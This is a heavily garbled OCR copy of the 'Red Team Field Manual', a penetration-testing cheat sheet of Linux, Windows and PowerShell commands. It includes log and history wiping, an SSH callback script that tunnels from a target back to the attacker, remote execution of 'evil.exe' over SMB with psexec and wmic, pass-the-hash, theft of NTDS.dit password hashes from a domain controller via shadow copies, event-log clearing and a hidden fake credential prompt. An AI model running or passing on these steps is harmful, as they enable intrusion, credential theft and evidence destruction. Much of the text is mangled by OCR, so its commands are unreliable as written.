RIFM 


RED TEAM FIELD MANUAL 


BEN CLARK 


Vo 10 


RTFM. Copyright © 2013 by Ben Clark 


All rights reserved. No part of this work may be reproduced or transmitted 
in any form or by any means, without prior written permission of the 
copyright owner. 


ISBN-10: 1494295504 
ISBN-IS: 9758-14942959509 


Technical Editor: Joe Vest 
Graphic: Joe Vest 


Product and company names mentioned herein may be the trademarks of their 
respective owners. Rather than use a trademark symbol with every occurrence 
of a trademarked name, the author uses the names only in an editorial 
fashion, with no intention of infringement of the trademark. Use of a term 
in this book should not be regarded as affecting the validity of any 
trademark or service mark. 


The information in this book is distributed "as is". While every precaution 
was taken to ensure the accuracy of the material, the author assumes no 
responsibility or liability for errors or omissions, or for damages 


resulting from the use of the information contained herein. 


TABLE OF CONTENTS 


MM 4 
NNN 14 
FN 34 
[LBS ANB TRICHS ENE ERE 42 
HOU REE meretur malay aaa Ee DE DE 50 
MN. 66 
DET REE EEE N kose sea ea enan 72 
FONN 76 
MSN 84 
FG 94 
> EEE EEE EEE 95 


THS Bonus Material added by OE800 


Nmap Cheat Sheet 
INmap Cheat Sheet 2 
Wireshark Display Filters 
Common Ports List 
Google Cheat Sheet 
Scapy 

TCPDUMP 

NAT 

aos 

IPv4 


IPv6 


*NIX 


LINUX NETWORK COMMANDS 


= m 


Watc 


netstat -ant 
netstat  -tulpn 


lsof -i 
smb:// ip /share 
share user x.x.x.x CS 


smbclient -U user \\\\ ip \\ share 


ifconfig ethf ip / cidr 
ifconfig eth0:1 ip. / cid 
route add default gw 
ifconfig eth# mtu [size] 
export MAC-XX:XX:XX:XX:XX 
ifconfig int hv ether 
macchanger -m MAC int 
iwlist int scan 

Ord -- Ap 
lost "ID 
host et SEV... 
dig @ ip domain -t AXFR 
host -1 domain namesvr 
ip xfrm state list 

ip addr add ip / cidr 
/var/log/messages | 
tepkill host ip 
echo "1" 
echo "nameserver x.x.x.x" 


and por 


nbtstat 
id 

W 

who -a 
last -a 
ps -ef 
dr --nh 
uname 
mount 
getent passwd 
PATH=SPATH: /home/mypath 
Kill pro 

cat /etc/issue 

cat /etc/'release' 

cat /proc/version 

rpm --query -all 

ED —iVh *%,rpn 

dpkg -get-selections 
dpkg -I *.deb 

pkginfo 

which 
chmod 


-A 


xd 


tscsh/csh/ksh/bash 
750 tcsh/csh/ksh 


gwo 


r 
Lp 


SM 
MAC 


je 


Service top. url-con 


dev ethO 
grep DHCP 


port 


/proc/sys/net/ipv4/ip forward 


letce/resolv.cont 


etwork connections 
Tcp connections -anu-udp 
Connections with PIDs 
Established connections 
Access windows smb share 
Mount Windows share 

SMB connect 

Set IP and netmask 

Set virtual interface 
Set GW 

Change MTU size 

Change MAC 
Change MAC 
Backtrack MAC 
Built-in wifi 
Domain lookup for IP 
Domain lookup for IP 
Domain SRV lookup 

DNS Zone Xfer 

DNS Zone Xfer 

Print existing VPN keys 
Adds “hidden” interface 
List DHCP assignments 
Block ip:port 

Turn on IP Forwarding 
Add DNS Server 


changer 
scanner 


LINUX SYSTEM INFO 


Get hostname for 
Current username 
Logged on users 
User information 
Last users logged on 
Process listing (top) 
Disk usage (free) 
Kernel version/CPU info 
Mounted file systems 
Show list of users 

Add to PATH variable 
Kills process with pid 
Show OS info 

Show OS version info 
Show kernel info 


Installed pkgs (Redhat) 
Install RPM (-e=remove) 
Installed pkgs (Ubuntu) 
Install DEB (-r=remove) 
Installed pkgs (Solaris) 
Show location of executable 
Disable shell , force bash 


LINUX UTILITY COMMANDS 


NAN 


wget http:// url 
rdesktop ip 

scp /tmp/file user@x.x.x.x:/tmp/file 
scp user@ remoteip :/tmp/file /tmp/file 
useradd -m user 

passwd user 

rmuser uname 


-O url.txt -o /dev/null 


script a outrile 
apropos subject 
history 

!- num 


Grab url 
Remote Desktop to ip 

Put file 

Get file 

Add user 

Change user password 

Remove user 

Record shell : Ctrl-D stops 
Find related command 

View users command history 
Executes line # in history 


LINUX FILE COMMANDS 


diff filel file2 
rm -rf dir 


shred era ce 
touch er, ref Eile ELIE 
touch -t YYYYMMDDHHSS file 


sudo fdisk -1 
mount /dev/sda# /mnt/usbkey 
md5sum -t file 


echo -n "str" | md5sum 
shalsum file 
sort -u 


grep eo. "str" File 
tar cf file.tar files 
tar xf file.tar 

tar ezf trle.tar.:gz files 
tar xzf filé.tar.gz 


£ 


tar GJE Tilertar,bz2 files 
tar xjf file.tar.bz2 
gzip file 
ğzıb a Trle,gz 
upx -9 -o out.exe orig.exe 

zip: “r “zipname-zip “VDirecteryx” 

dd skipe1000 count=2000 bs=8 ifefile of=file 


split =b 9Kk filè prefix 


awk “sub (fs. A) rumpi Ex vin.txt 

find -i -name file -type '.pdf 

find / -perm -4000 -o -perm -2000 -exec ls - 
Løp dt XS 

dos2unix file 

file file 

chattr (+/-)i file 


Compare files 
Force delete of. dir 


Overwrite/delete file 
Matches ref file timestamp 
Set file timestamp 

List connected drives 
Mount USB key 

Compute md5 hash 

Generate md5 hash 

SHAl hash of file 
Sort/show unique lines 
Count lines w/ "str" 
Create .tar from files 
EXUZAQZ uad 

Create .tar.gz 

Extract .tar.gz 

Create .tar.bz2 

Extract .tar.bz2 
Compress/rename file 
Decompress file.gz 

UPX packs orig.exe 

Create zip 

Cut block 1K=3K from file 
Split file into 9K chunks 
Win compatible txt file 
Find PDF files 

Search for setuid files 


Convert to 'nix format 
Determine file type/info 
Set/Unset immutable bit 


LINUX MÓisc COMMANDS 


Unset HISTFLLE 

ssh user@ ip arecord - | aplay - 

gcc -o outfile myfile.c 

met 5 

cat /etc/*syslog*.conf | grep -v " 4" 


grep 'href-' file |cut -d"/" -f3 |grep 
url |sort -u 

dd if=/dev/urandom of= file bs=3145728 
count=100 


Disable history logging 
Record remote mic 
Compile C,C*- 

Reboot (0 = shutdown) 
List of log files 

Strip Links Xn uri com 


Make random 3MB file 


LINUX "COVER YOUR TRACKS" 


nor 


echo 
echo 


/var/log/auth.log 
“/.bash history 
rm Ès Dbash, history rå 
history se 

export HISTFILESIZE=O 
export HISTSIZE=O 

unset HISTFILE 


kilt —0 99 


ln Fdev muld. ey. pasi histor, eser 


COMMANDS 


Clear auth.log file 


Clear current user bash history 
Delete 


pash. history tilé 


Clear current session history 
Set history max lines to 0 
Set histroy max commands to 0 


Disable 
logout 


history logging 
to take effect) 


Kills current session 


Permanently send all bash history 


commands to /dev/null 


LINUX FILE SYSTEM STRUCTURE 


/etc/shadow 

/etc/passwd 

/etc/group 

ZE 

/etc/init.d 

/etc/hosts 

/etc/HOSTNAME 
/etc/network/interfaces 
/etc/profile 
/etc/apt/sources.list 
/etc/resolv.conf 

/home/ user /.bash_history 
/usr/share/wireshark/manuf 
-/.ssh/ 

/var/log 

/var/adm 

/var/spool/cron 
/var/log/apache/access.log 
/etc/fstab 


Use 
Boo 


Sys 


E 


+ 


+ 


binaries 
-up related files 
Interface for system devices 


em configuration files 


Base directory for user files 
Critical software libraries 
Third party software 


Sys 


+ 


em and running programs 


Home directory of root user 


Sys 
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em administrator binaries 


Temporary files 
Less critical files 
Variable system files 


LINUX FILES 


Local users’ 


hashes 


Local users 

Local groups 

Startup services 

Service 

Known hostnames and IPs 

Full hostname with domain 
Network configuration 

System environment variables 
Ubuntu sources list 
Nameserver configuration 


Bash history 


(also /root/) 


Vendor-MAC lookup 
SSH keystore 


System log files 
System log files 


(most Linux) 
(Unix) 


hLlst cron files 
Apache connection log 
Static file system info 


(need to 


LINUX SCRIPTING 


PING SWEEP 


for Xm das bil OS pLug sé n l1.lcbl9x [re EL BT font >" T -3r4 
ips.txt; done 


AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT 


#!/bin/bash 

echo "Enter Class C Range: i.e. 192.168.3" 

read range 

For. 1D In las25tLa Th de 

host $range.$ip |grep "name pointer" |cut -d" " -f5 
done 


FORK BOMB (CREATES PROCESSES UNTIL SYSTEM "CRASHES") 


(04:14:86): 


DNS REVERSE LOOKUP 


for IP AA 11.028215 do dig ked 1 u Gen S2p dns.txt; done; 


IP BANNING SCRIPT 


#!/bin/sh 

# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2 
# It assumes 1 is the router and does not ban IPs .20, .21, .22 

i=2 

while | Si =le:-253 1 


do 
if [ Si -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then 
echo "BANNED: arp -s 192.168.1.Si" 
arp -s 192.1698.1.5i 00:00:00:00:00:0a 
else 
echo "IP NOT BANNED: 192.168.1.91^^44^4A4X4A A K Ak &K&KAK AKA A KAM 
echo Mk 1A LA A AX A X Kk Ak LA X A A RR KE k KU LB LR LA AR AR Kk A AA A A I KK A A I 
fi 
i="expr Si 41” 
done 


SSH CALLBACK 


Set up script in crontab to callback every X minutes. Highly recommend you 
set up a generic user on red team computer (with no shell privs). Script 
will use the private key (located on callback source computer) to connect 
to a public key (on red team computer). Red teamer connects to target via a 
local SSH session (in the example below, use #ssh -p4040 localhost) 


#! /bin/sh 

# Callback script located on callback source computer (target) 
killall ssh /dev/null 2 «l 

sleep 5 

REMLIS=4040 

REMUSR=user 

HOSTS="domainl.com domain2.com domain3.com" 

for LIVEHOST in SHOSTS; 


do 

COUNT=$ (ping -c2 SLIVEHOST | grep 'received' | awk -F',' "( print 
S2 I Jawes EE Print 91 pt) 

if [I SCOUNT gt 0 17]; then 


ssh -R S{REMLIS}:localhost:22 -i 
"/home/S(REMUSR)/.ssh/id rsa" -N S(LIVEHOST) -1 S{REMUSR} 
FL 


IPTABLES 


“ Use ip6tables for IPv6 rules 


iptables-save - file. Dump iptables (with 
counters) rules to stdout 
iptables-restore file Restore iptables rules 
iptables -L -v --line-numbers List all iptables rules with 
affected and line numbers 
iptables -F Flush all iptables rules 
iptables -P INPUT/FORWARD/OUTPUT Change default policy for 
ACCEPT/REJECT/DROP rules that don’t match rules 
iptables =A INPUT si. Interface m state — Allow established 
state RELATED, ESTABLISHED -j ACCEPT connections on INPUT 
iptables -D INPUT 7 Delete "th inbound rule 
iptables -t raw -L -n Increase throughput by 
turning off statefulness 
iptables -P INPUT DROP Drop all packets 


ALLOW SSH ON PORT 22 OUTBOUND 
iptables «A OUTPUT “o” «Iface. -D CH -dport 22 -m state —-state 
NEW, ESTABLISHED S ACCEPT 


iptables -A INPUT -i iface -p tcp --sport 22 -m state --state 
ESTABLISHED -j ACCEPT 


ALLOW ICMP OUTBOUND 


iptables -A OUTPUT -i iface -p icmp --icmp-type echo-request -j ACCEPT 
iptables -A INPUT -o iface -p icmp --icmp-type echo-reply -j ACCEPT 


PORT FORWARD 


echo "1" /proc/sys/net/ipv4/ip forward 
# OR - sysctl net.ipv4.ip forward=l 
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport 


443 -to-destination  attk ip :443 

iptables -t nat -A POSTROUTING -p tcp -i ethO -j SNAT -s target subnet 
Oldr. ed. attacklp. apart 443 —to-source *plvotip 

iptables -t filter -I FORWARD 1 -j ACCEPT 


ALLOW ONLY 1.1.1.0/24, ports 80,443 AND LOG DROPS TO 
/VAR/LOG/MESSAGES 


iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED, ESTABLISHED, NEW 
-ptep —m moltiport. -—edports 30,423: et. ACGGEPT 
iptables -A INPUT -i eth0 -m state --state RELATED, ESTABLISHED -j ACCEPT 
iptables -P INPUT DROP 
iptables -A OUTPUT -o ethO0 -j ACCEPT 
O 


iptables -A INPUT -i lo -j ACCEPT 

iptables -A OUTPUT -o lo -j ACCEPT 

iptables -N LOGGING 

iptables -A INPUT -j LOGGING 

iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED " 
iptables -A LOGGING -j DROP 
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UPDATE-RC.D 


Check/change startup services 


service --status-all 

service service start 

service service stop 

service service status 
update-rc.d -f service remove 
update-rc.d service defaults 


* Available in Linux distributions such as Red Hat Enterprise Linux 
CentOS and Oracle Enterprise Linux 


f 


chkconfig 


T 


chkconfig 


T 


chkcontfig 


T 


ahkoontig 


e.g. 


screen 
screen 
screen 
Gra 


num | 


QOQ Q0OQ0O R QOOQ OO 
go 0) 0) 0 0 vd DD m mw 


-list 


servi 
servi 


servi 


name 


name 
name 


name 


ce 
ce 


Ce 


[= 
[=] 


Start a service 
Stop a service 
Check status of a service 


Remove a service start up cmd 
f- Xf the /eébto/lnit.d. start up 


file exists) 
Add a start up service 


CHKCONFIG 


chkconfig iptables off 


(OEL) 


List existing services and run 


Check single service status 
[optional to add 
level at which service runs] 


Add service 


status 
ına 
on 1--level 3) 
off 1--level 3] Remove 
SCREEN 
(C-a == Control-a) 
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service 


Start new screen 


Service starts at boot 
Service does not start 


with name 


List running screens 


Attach 
Send 


cmd 


to screen 


List keybindings 


Detach 
Detach 
Create 
Switch 
SWLECH 


and logout 
new window 


to last active window 
num| name - 
See windows list and change 


to window 


to screen 


“name - 
anme 
(help) 


Kill current vindov 


Split display horizontally 


Split display vertically 
Jump to next display 
Remove current region 


Remove all regions but current 


(- 


(RHEL), 


X11 


CAPTURE REMOTE X11 WINDOWS AND CONVERT TO JPG 


xud -display. ip 10 “root “out /tmp/test.xpm 
xwud -in /tmp/testl.xpm 
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg 


OPEN X11 STREAM VIEWING 


xvd -display 1.1.1.1:0 “root -silent -out xildump 
Read dumped file with xwudtopnm or GIMP 


TCPDUMP 


CAPTURE PACKETS ON ETEO IN ASCII AND HEX AND WRITE TO FILE 


. tcpdump -i ethÜ -XX -w out.pcap 


CAPTURE HTTP TRAFFIC TO 2.2.2.2 


> TEBIUMP"-=1.,8th0 port 5S0 dst 2.2.2.2 


SHOW CONNECTIONS TO A SPECIFIC IP 


topdump -—r ethO' -“tttt dst 192.168.1.22.and not net 192.168.1.0/24 


PRINT ALL PING RESPONSES 


tcpdump -i ethO “icmp[icmptype] == icmp-echoreply' 


CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP 


topp U -EERO=ESO' tet "udgp und port-55!' 


NATIVE KALI COMMANDS 


WMIC EQUIVALENT 


. wmis -U DOMAIN\ user $ password // DC. cmd.exe /c command 


MOUNT SMB SHARE 


# Mounts to /mnt/share. For other options besides ntimssp, man mount.cifs 
. mount.cifs // ip /share /mnt/share -o 
user= user ,pass= pass ,sec=ntlmssp,domain= domain ‚rw 


UPDATING KALI 


apt-get update 
apt-get upgrade 


PFSENSE 


pfSsh.php 
pfSsh.php playback enableallowallwan 


pfSsh.php playback enablesshd 


preeL e 
pEcti esr 
picul =58 
viconrilg 


rm /tmp/config.cache 


fete reg.reload åll 


SOLARIS 


iIfEGntiG +å 

netstat -in 

PÉ COME LE ur 

ıfconfig “éEho.-ahèp 

ifconfig ethO plumb up ip netmask nmask 
route add default ip 


loginse cp 
SVOS- sa 
Drstet oa 


svcadm start ssh 

inetadm -e telnet (-d for disable) 
prtcont | grep Memory 

iostat “ün 

showrev -c /usr/bin/bash 

shütdown- -L16. “QU ez 

dfmounts 

smc 

snoop -d int -c pkt # -o results.pcap 
/etc/vfstab 

/var/adm/logging 

/etc/default/' 

/etc/system 

/var/adm/messages 

feteorauto:. 

/etc/inet/ipnodes 
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pfSense Shell System 

Allow all inbound WAN 
connections (adds to visible 
rules in WAN rules) 

Enable ssh inbound/outbound 
Show NAT rules 

Show filter rules 

Show all rules 

Edit config 

Remove cached (backup) 
config after editing the 
eurrent running 

Reload entire config 


List of interfaces 

List of interface 

Route listing 

Start DHCP Glient 

oet TP 

Set gateway 

List users w/out passwords 
List all services w/ status 
Process listing (top) 
Start SSH service 

Enable telnet 

Total physical memory 

Hard disk size 

Information on a binary 
Restart system 

List clients connected NFS 
Management GUI 

Packet capture 

File system mount table 
Login attempt log 

Default settings 

Kernel modules & config 
Syslog location 
Automounter config files 
IPv4/IPv6 host file 


WINDOWS 


WINDOWS VERSIONS 


[x indows NT 3.1 (All) 
NT 3.5 Windows NT 3.5 (All) 
NT 3.51 Windows NT 3.51 (All) 
NT 4.0 Windows NT 4.0 (All) 
NT 5.0 Windows 2000 (All) 
ND I Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) 
NT 5,2 Windows XP (64-bit, Pro 64-bit) 


Windows Server 2003 & R2 (Standard, Enterprise) 
Windows Home Server 
NT 6.O Windows Vista (Starter, Home, Basic, Home Premium, 
Business, Enterprise, Ultimate) 
Windows Server 2008 (Foundation, Standard, Enterprise) 


NT 6.1 Windows " (Starter, Home, Pro, Enterprise, Ultimate) 
Windows Server 2008 R2 (Foundation, Standard, Enterprise) 
NT 6.2 Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) 


Windows Phone 8 
Windows Server 2012 (Foundation, Essentials, Standard) 


WINDOWS FILES 


ANS 


$SYSTEMROOTS Typically C:\Windows 
$SYSTEMROOT%\System32\drivers\etc\hosts DNS entries 
$SYSTEMROOT%\System32\drivers\etc\networks Network settings 
$SYSTEMROOTS system32`confiqgN SAM User 6 password hashes 
$SYSTEMROOT$NrepairNSAM Backup copy of SAM 
$SYSTEMROOT$NSystem32NconfigNRegBackNSAM Backup copy of SAM 
SWINDIR$Nsystem32NconfigNAppEvent.Evt Application Log 
SWINDIR$Nsystem32NconfigNSecEvent.Evt Security Log 
$ALLUSERSPROFILE%\Start Menu\Programs\Startup\ Startup Location 
$USERPROFILE%\Start Menu\Programs\Startup\ Startup Location 
SSYSTEMROOT%\Prefetch Prefetch dir (EXE logs) 


STARTUP DIRECTORIES 


Wınpows NT 6.1,6.0 


# All users 
$SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup 


# Specific users 
$SystemDrive$NUsersN$UserName$NAppDataNRoamingMMicrosoftNWindowsNStart 
Menu\Programs\Startup 


VıNpovs NT 5.2, 5.1, 5.0 


%SystemDrive%\Documents and Settings\All Users`Start Menu\Programs\Startup 


WINDOWS 9x 


$SystemDrive$NwmiOWSNStart Menu\Programs\Startup 


Wınpows NT 4.0, 3.51, 3.50 


%SystemDrive$\WINNT\Profiles\All Users\Start Menu\Programs\Startup 
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WINDOWS SYSTEM INFO COMMANDS 


ver Get OS version 

sc query state-all Show services 

tasklist /svc Show processes & services 
tasklist /m Show all processes & DLLs 
tasklist /S ip /v Remote process listing 
taskkill /PID pid /F Force process to terminate 
systeminfo /S ip. /U domain\user /P Pwd Remote system info 

reg query NN ip \ RegDomain \ Key  /v Query remote registry, 
Value /S-all values 

reg query HKLM /f password /t REG SZ /s Search registry for password 
fsutil fsinfo drives List drives 'must be admin 
dar Jae T0-00N* pat” Search for all PDFs 

dir /a /b c:\windows\kb* Search for patches 

findstr /si password *,txt| *sxml]| "xls Search files for password 
tree /F /A ci tree.txt Directory listing of C: 
reg save HKLMNSecurity security.hive Save security hive to file 
echo %USERNAMES Current user 


WINDOWS NET/DoMAIN COMMANDS 


view /domain Hosts in current domain 
view /domain: [MYDOMAIN] Hosts in [MYDOMAIN] 
net user /domain All users in current domain 
net user user pass /add Add user 
net localgroup "Administrators" user  /add Add user to Administrators 
net accounts /domain Domain password policy 
net localgroup "Administrators" List local Admins 
net group /domain List domain groups 
net group "Domain Admins" /domain List users in Domain Admins 
net group "Domain Controllers" /domain List DCs for current domain 
net share Current SMB shares 
net session | find / "MN" Active SMB sessions 
net user user  /ACTIVE:yes /domain Unlock domain user account 
net user user " newpassword " /domain Change domain user password 
net share share c:\share Share folder 


/ GRANT:Everyone, FULL 


WINDOWS REMOTE COMMANDS 


SE 


tasklist /S ip /v Remote process listing 
systeminfo /S ip /U domain\user /P Pwd Remote systeminfo 

net share NN ip Shares of remote computer 
net use NN ip Remote filesystem (IPCS) 
net use z: NN ip \share password Map drive, specified 
/user:DOMAINN user credentials 

reg add NN ip \ regkey \ value Add registry key remotely 
SC NN ip. create service Create a remote service 
binpath=C:\Windows\System32\x.exe start= (space after start=) 

auto 

xcopy /s NN ip Vdir C:Xlocal Copy remote folder 
shutdown /m NN ip /r /t O /f Remotely reboot machine 
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WINDOWS NETWORK COMMANDS 


TDCOn 
ipcon 


netst 
netst 


fig /all 
fig /displaydns 
netstat -ano 


at —anop tcp 1 
at -an| findstr LISTENING 


IP configuration 
Local DNS cache 
Open connections 
Netstat loop 
LISTENING ports 


route print Routing table 

arp -a Known MACs (ARP table) 
nslookup, set type-any, ls -d domain DNS Zone Xfer 
fesultsstst, exit 

nslookup -type-SRV www. tcp.url.com Domain SRV lookup ( ldap, 


kerberos;. Sip) 


tftp -I ip GET  remotefile TFTP file transfer 
netsh wlan show profiles Saved wireless profiles 
netsh firewall set opmode disable Disable firewall (“Old) 
netsh wlan export profile folder-. key=clear Export wifi plaintext pwd 
netsh interface ip show interfaces List interface IDs/MTUs 
netsh interface ip set address local static Set IP 

ip nmask gw ID 


Set DNS server 


netsh interface ip set dns local static ip 


netsh interface ip set address local dhcp Set interface to use DHCP 


WINDOWS UTILITY COMMANDS 


— 


type file. 
del path N"." /a /s /q /f 
find /I "str" filename 
command | find /c /v "" 
at HH:MM file [args] (i.e. at 14:45 cmd 
kè) 
runas /user: user " file  [args]" 


restart /r /t O 
br «gg 5132" 
makecab file 
Wusa.exe /uninstall /kb: ### 


win, txt unix.txt 


cmd.exe "wevtutil qe Application /c:40 


ftbext /rditéue" 
lusrmgr.msc 
services.msc 
taskmgr.exe 
secpool.msc 
eventvwr.msc 


Display file contents 
Forceably delete all files 


in path. 

Find. "str" 

Line count of cmd output 
schedule * file. to run 


Run file as user. 
Restart now 

Removes CR & `Z (*nix) 
Native compression 
Uninstall patch 

CLI Event Viewer 


Local user manager 
Services control panel 
Task manager 

Security policy manager 
Event viewer 


MISC. COMMANDS 


LOCK WORKSTATION 


rundll32.dll user32.dll LockWorkstation 


DISABLE WINDOWS FIREWALL 


netsh advfirewall set currentprofile state off 
netsh advfirewall set allprofiles state off 


NATIVE WINDOWS PORT FORWARD (* MUST BE ADMIN) 


netsh interface portproxy add v4tov4 listenport=3000 
listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2 


#Remove 
. netsh interface portproxy delete v4tov4 listenport=3000 
listenaddress=1.1.1.1 


RE-ENABLE COMMAND PROMPT 


reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t 
REG DWORD /d 0 /f 


PSEXEC 


EXECUTE FILE HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS 


. psexec /accepteula NN targetIP -u domain\user -p password -c -f 
VN smbIP \share\file.exe 


RUN REMOTE COMMAND WITH SPECIFIED HASH 


psexec /accepteula AN ip -u Domain\user -p LM : NTLM cmd.exe /c dir 
c:\Progra-l 


RUN REMOTE COMMAND AS SYSTEM 


— psexec /accepteula AN ip -s cmd.exe 
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TERMINAL SERVICES (RDP) 


START RDP 


3 
LI 


Create regfile.reg file with following line in it: 

HKEY LOCAL MACHINENSYSTEMNCurrentControlSetNControlNTerminalService 
"fDenyTSConnections"=dword:00000000 

reg import regfile.reg 

net start "termservice" 

sc config termservice start= auto 

net start termservice 


O) 01 VK (9 P2 


——OR-— 


reg add "HKEY LOCAL MACHINENSYSTEMNCurentControlSetNControlNTerminal 
Server" /v fDenyTSConnections /t REG DWORD /d O /f 


TuNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES) 


REG ADD "HKLM\System\CurrentControlSet\Control\Terminal 
Server\WinStations\RDP-Tcp" /v PortNumber /t REG DWORD /d 443 /f 


DISABLE NETWORK LEVEL AUTHENTICATION, ADD FIREWALL EXCEPTION 


reg add "HKEY LOCAL MACHINENSYSTEMNCurentControlSetNControlNTerminal 
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG DWORD /d "O" /f 


netsh firewall set service type - remotedesktop mode - enable 


IMPORT A SCHEDULE TASK FROM AN "EXPORTED TASK" XML 


schtasks.exe /create /tn MyTask /xml "C:NMyTask.xml" /f 
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WMIC 


NUN 


wmic [alias] get /? List all attributes 
wmic [alias] call /? Callable methods 
wmic process list full Process attributes 
wmic startupwmic service Starts wmic service 
wmic ntdomain list Domain and DC info 
wmic qfe List all patches 
WALE: process call Create "process name" Execute process 
wmic process where name="process" call Terminate process 
terminate 

wmic logicaldisk get description,name View logical shares 
wmic cpu get DataWidth /format:list Display 32 || 64 bit 


WMIC [ALIAS] [WHERE] [CLAUSE] 


[alias] == process, share, startup, service, nicconfig, useraccount, etc. 
[where] == where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc. 
[clause] == list [fullibrief], get [attribl, attrib2], call [method], 
delete 


EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED 
CREDENTIALS 


wmic /node: targetIP /user:domain\user /password:password process call 
create "NX smbIP \share\evil.exe" 


UNINSTALL SOFTWARE 


wmic product get name /value # Get software names 
wmic product where name="XXX" call uninstall /nointeractive 


REMOTELY DETERMINE LOGGED IN USER 


wmic /node:remotecomputer computersystem get username 


REMOTE PROCESS LISTING EVERY SECOND 


wmic /node:machinename process list brief /every:l 


REMOTELY START RDP 


wmic /node:"machinename 4" path Win32 TerminalServiceSetting where 
AlLöwrSConnections="U" call SetAllowISConnections "I" 


LIST NUMBER OF TIMES USER HAS LOGGED ON 


wmic netlogin where (name like "$adm$") get numberoflogons 


SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY 


wmic service get name,displayname,pathname, startmode |findstr /i "auto 
|ELNASET si /v "coyvindovsso” |ELRASET» Ju mee 
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VOLUME SHADOW CoPY 


1. wmic /node: DC IP /user:"DOMAIN\user" /password: "PASS" process 
call create "cmd /c vssadmin list shadows 2 &1 
c: Vtempvoutput.txt" 


# If any copies already exist then exfil, otherwise create using 
following commands. Check output.txt for any errors 


2.  wmic /node: DC IP /user:"DOMAIN\user" /password: "PASS" process 
call create "cmd /c vssadmin create shadow /for=C: 2 &1 
C: NEempNoutbut,.txtc" 

3.  wmic /node: DC IP /user:"DOMAIN\user" /password:" PASS" process 
call create "cmd /c copy 
NN?NGLOBALROOTNDeviceMHarddiskVolumeShadowCopylNWindowsNSystem32Nco 
nfig SYSTEM C:\temp\system.hive 2 al ESXTemnp (output. Ext” 

4. wmic /node: DC IP /user:"DOMAIN\user" /password: "PASS" process 
call create "cmd /c copy 
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\NTDS\NTDS.dit 
C:\temp\ntds.dit 2 al C:\temp\output.txt" 


# Step by step instructions on room362.com for step below 


Sa From Linux, download and run ntdsxtract and libesedb to export 
hashes or other domain information 
a; Additional instructions found under the VSSOWN section 


b.  ntdsxtract - http://www.ntdsxtract.com 
C.  libesedb - http://code.google.com/p/libesedb/ 
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POWERSHELL 


stop-transcript Stops recording 
get-content file displays file contents 
get-help command  -examples Shows examples of command 
get-command * string. * Searches for cmd string 
get-service Displays services (stop- 
service, start-service) 
get-wmiobject -class win32 service Displays services, but takes 
alternate credentials 
SPSVesionTable Display powershell version 
powershell.exe -version 2.0 Run powershell 2.0 from 3.0 
get-service measure-object Returns # of services 
get-psdrive Returns list of PSDrives 
get-process select -expandproperty name Returns only names 
get-help * -parameter credential Cmdlets that take creds 
get-wmiobject  -list *network Available WMI network cmds 
[Net.DNS]::GetHostEntry(" ip ") DNS Lookup 


CLEAR SECURITY & APPLCIATION EVENT LOG FOR REMOTE SERVER (SVRO1) 


Get-EventLog -list 
Clear-EventLog -logname Application, Security -computername SVRO1 


EXPORT OS INFO INTO CSV FILE 


Get-WmiObject -class win32 operatingsystem | select -property ` | export- 
Gsv ES (OSSTRE 


LIST RUNNING SERVICES 


Get-Service | where object ($ .status -eq "Running") 


PERSISTENT PSDRIVE TO REMOTE FILE SHARE: 


New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i 


RETURN FILES WITH WRITE DATE PAST 8/20 


Get-ChildItem -Path c:\ -Force -Recurse -Filter ^.log -ErrorAction 
SilentlyContinue | where ($ .LastWriteTime -gt "2012-08-20") 


FILE DOWNLOAD OVER HTTP 


(new-object system.net.webclient).downloadFile("url","dest") 


TCP PORT CONNECTION (SCANNER) 


Sports= (#,#,#) ;Sip="x.x.x.x"; foreach (Sport in $ports) {try{$socket=New- 
object System.Net.Sockets.TCPClient ($ip, Sport); };catch{};if ($socket -eq 
SNULL) {echo Sip":"Sport" - Closed"; }else{echo Sip":"Sport" - Open"; S$socket 
= SNULL; }} 


PING WITH 500 MILLISECOND TIMEOUT 


Sping = New-Object System.Net.Networkinformation.ping 
Sping-sena(" ip. ", 500) 
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BASIC AUTHENTICATION POPUP 


powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass 
SHost.UI.PromptForCredential(" title "," message "," user "," domain ") 


Run EXE EVERY 4 HOURS BETWEEN Auc 8-11, 2013 AND THE HOURS OF 
0800-1700 (FROM CMD.EXE) 


powershell.exe -Command "do (if ((Get-Date -format yyyyMMdd-HHmm) -match 
“Z0130B(0[8=9]: |1A[O0SI)])=(OG[S8=I] 11107 ]1119=5110=91"%) (Start-Process: = 
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400} )while(1)" 


POWERSHELL RUNAS 


Spw = convertto-securestring -string "PASSWORD" -asplaintext -force; 

Spp new-object -typename System.Management.Automation.PSCredential - 
argumentlist "DOMAIN\user", Spw; 

Start-Process powershell -Credential $pp -ArgumentList “-noprofile -command 
&{Start-Process file.exe -verb runas)” 


EMAIL SENDER 


powershell.exe Send-MailMessage -to " email " -from " email " -subject 
"Subject" -a " attachment file path " -body "Body" -SmtpServer Target 
Email Server IP 


TURN ON POWERSHELL REMOTING (WITH VALID CREDENTIALS) 


net time \\ip 

at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'" 
at \\ip timet+l  "Powershell -Command 'Set-Item 
wsman:\localhost\client\trustedhosts ''" 

at \\ip time+2  "Powershell -Command "Restart-Service WinRM'" 
Enter-PSSession -ComputerName ip -Credential username 


